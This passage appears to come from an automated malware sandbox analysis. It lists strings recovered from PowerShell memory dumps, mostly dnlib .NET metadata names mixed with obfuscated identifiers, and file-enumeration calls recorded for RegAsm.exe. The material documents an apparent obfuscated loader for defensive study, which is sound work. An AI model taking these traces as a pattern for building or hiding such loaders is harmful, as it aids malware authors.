                    Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.pdbhP source: powershell.exe, 00000007.00000002.433523996.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.476880205.000007FE89A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.478544858.000007FE89C30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.497351507.000007FE89C50000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodyah6t8o3uffkxjgu59cevu8z6d3v7afoyij1iva`1dnlib.dotnetfiledefuserdnlib.pemachinednlib.dotnetarraysigbasednlib.dotnetcaargumentdnlib.dotnetcorlibtypesigk7mitcpdacx0vbmgqr7go6sqfpjjw30jf7n7rndnlib.dotnetelementtypednlib.dotnet.writernetresourcese9knvnt7u6ezsdsyxfxq2zthltuqwadl1q4ng9uydph65qnfdjckrw9h9dnlib.dotnetszarraysigdnlib.dotnetmanifestresourceattributesdnlib.dotnetmethodoverrider3jb0by5afjjlcspugywt02vwyehjyzy3wqzjcdnlib.dotnet.writerdeclsecuritywriterdnlib.dotnet.mdrawgenericparamrowdnlib.dotnetiassemblyxvmacrdbfrna5cdrrsfcqrsledc4wkisxlwn8gx0r4etd8ltoqpdggldcnnyflydokrpals0wxhldnlib.dotnetgenericargumentsdnlib.dotnetfieldsigtimivifhsjslaapdgc5hhptoaf6vr7ylgvksrsdnlib.dotnetexportedtypednlib.dotnetimporteroptionstvcwigwbgbhgtsv2wgudnpckvwengjxlflbtcgdnlib.threadinglistiteratedelegate`1origsectione6whkeiu6j5uz8xzsbjwa9opui5h9kdvhcycmq<findconstructors>d__279dnlib.peimagentheadersdnlib.threadingextensionsdnlib.dotnetmodulecontextdnlib.dotneteventattributeswtroi5hszw8mdtxowuckya5b1hwfqiio31nfpol5kjpak7nhlkgm40bsnkxlemxzxah7kglyl2`2dnlib.dotnet.writerhotpooldnlib.dotnet.writericustomattributewriterhelperdnlib.dotnetalltypeshelperdnlib.dotnetsignaturealgorithmdnlib.dotnetmodulerefdnlib.iofilesectionty9dl25bl5pkcespd8tdnlib.threadingenumerableiteratealldelegate`1bia61ly7isto9pg5c9upcniidyu8622j474ov4dnlib.dotnet.pdb.managedpdbexceptiondnlib.dotnetleafsigkkoi8p4jm718hslt5bhdnlib.iomemoryimagestreamdnlib.dotnetmoduledefatfnpjcoreq6csgbsv8ppuh1vcgppflbdi2g14dnlib.dotnetgenericparamconstraintigufyy4regnwyq1l7j2dnlib.dotnet.mdstreamheaderolyifw3a2xfhdqcmgs4xnjn0z3dkxdtlsxaunh`1dnlib.ioibinaryreaderdnlib.dotnetimemberforwardeddnlib.dotnet.mdrawfieldrvarowdnlib.dotnetmarshalblobreaderhpalqfwouqcwnyvnxdxwq6pt5wgiqjnsebvd25dnlib.dotnet.writerhottablednlib.dotnetsigcomparerdnlib.iohomednlib.dotnettypeattributesdnlib.dotnetclasslayoutdnlib.dotnet.writerwin32resourceschunkdnlib.utilsilistlistener`1dnlib.dotnet.mdrawassemblyrefprocessorrowdnlib.dotnetigenericparameterproviderdnlib.ioapidnlib.dotnet.mdusstreamdnlib.dotnet.mdstringsstreamdnlib.dotnetassemblyresolveexception<>c__displayclass3_0`1dnlib.dotnetsafearraymarshaltypednlib.dotnetembeddedresourceavp7wcnjztffdx0erdwdnlib.dotnet.mdstorageflagsgaoaeqinjnrekdu1h8hkbymkfitnjqeqghb8yydnlib.dotnetinterfaceimpluserdnlib.dotnetimporterkdrexyhvyhc0nelp9e7ed2uglhrb3lwb2yb4hxg3ul7p5rcldjjfrjjltdnlib.dotnet.mdcolumnsizeotmggti9ivome3mt801aqpvaiiy0wnw9zf4n76<findassembliesmodulesearchpaths>d__60dnlib.dotnetresourcetypednlib.dotnet.emitmethodbodyreaderdnlib.dotnet.emitextensionsdnlib.dotnetfieldequalitycomparerdnlib.dotnetiimplementationdnlib.dotnet.mdraweventmaprowdnlib.dotnet.mdrawparamrowdnlib.dotnetistringdecrypterawhfvsxzxunrwtavn9wvvxbkvxvaipsmu94pk1dnlib.dotnetpublickeybasednlib.dotnet.mdrawmethodptrrowdnlib.dotnetfiledefdnlib.dotnet.mdrawpropertyrowdnlib.dotnet.writerhottable20wv7tomzo7klytloylsuafu1afzgo0sk6mcdcbwdnlib.ioioextensionsdnlib.dotnet.writer
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.mdrawenclogrow__staticarrayinittypesize=128skchoafiuzccagfu1ulu1ouewfnp4o5bbcebordnlib.dotnet.pdb.dssisymunmanagednamespacednlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64<findinstanceconstructors>d__278dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefvmgiohu4rhlwjc4ft3cwirwxoundyanqcsxgkwdnlib.dotnet.emitlocals9bza01aif9aby4c7e3ahci7r1cnumtb0pe7f8dnlib.dotneticontainsgenericparameterufifkpi0yhtg01xooqbyjsrq8i9dalkxs2njixtein7yneywyrkdslyi5pfofj6nsx3lilmvvwyndnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowrp3lvqhb5ifi4taqpd9afqlx6hcsqlvfkjo6chdnlib.ioiimagestreamcreatorvr1yetiu8dvhejimmsiwb5fzoizgxereurgyrsdnlib.dotnetvtablefixupsgehb0jpvekcjp0ycr56pgg8xgprx0iwziqn2f4e1ykpxrjj6hxigaeczqbv1mzwr3pwlopq0c4cnocert0ntxbgf7cnqyqorvjg0ipa7p7ofpwst1tymadi6pcurl8pr4ri24gicobxd5km0gnm6s9hthdhm4vdevnfwhymlslrdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerbkhyunxgsdfmobt2myul69nrax8isvyd3tqlo1dnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritera3owm62mw2ft3axtgkjup19wm2wy2htzvwhoqe<getrawrows>d__31dnlib.dotnetihasdeclsecuritydnlib.dotnet.pdb.dssisymunmanagedscopeur0afvcnmzwmqprmskojh6uhgca7lvtsnn1fdmdnlib.dotnetimanagedentrypoint<findall>d__5<getextramonopaths>d__55startup_informationexbiw1pkeigwdnnfrwilubmrcpstrr5ffy9zo9rgv46w33uubdimq2y3bhugkfjzcyofuu3za67`1dnlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparser<findall>d__9tfrag8naffslgxf79u7dnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatorhcgmpba7kqxx2lyt8vfdautss9c8jychnidlusesxe109d6cukcleumrlqtus9jnueozxcxvhttrhu2kpenzk7dlbeo0kerdnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorhjf2fnil2b66qgwad8ycksrm9iotoquh1mnuhadnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresource<getenumerator_nolock>d__45dnlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrow__staticarrayinittypesize=24bk4vsrp761al27krcu4kv79wgpumrzq7kalgccdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000020.00000002.497351507.000007FE89C53000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,16_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_10006580 FindFirstFileExA,16_2_10006580
